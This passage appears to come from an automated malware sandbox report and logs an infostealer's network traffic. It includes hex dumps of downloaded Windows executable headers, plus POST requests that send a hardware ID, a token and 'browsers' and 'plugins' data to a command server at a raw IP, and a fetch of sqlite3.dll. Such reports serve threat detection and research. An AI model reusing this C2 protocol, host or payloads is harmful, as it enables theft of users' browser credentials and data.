09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:33 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:33 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.172.128.151Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 43 38 37 30 38 45 43 41 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A4C8708ECAC93740105281------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"default100------AECAECFCAAEBFHIEHDGH--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKHost: 185.172.128.151Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="message"browsers------EGIDAFBAEBKKEBFIJEBK--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 185.172.128.151Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="message"plugins------CFIEBKEHCAKFCBFIDAAK--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.172.128.151Content-Length: 6975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCHost: 185.172.128.151Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 185.172.128.151Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.172.128.151Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file"------KJKJJEGIDBGIDGCBAFHC--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.172.128.151Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; 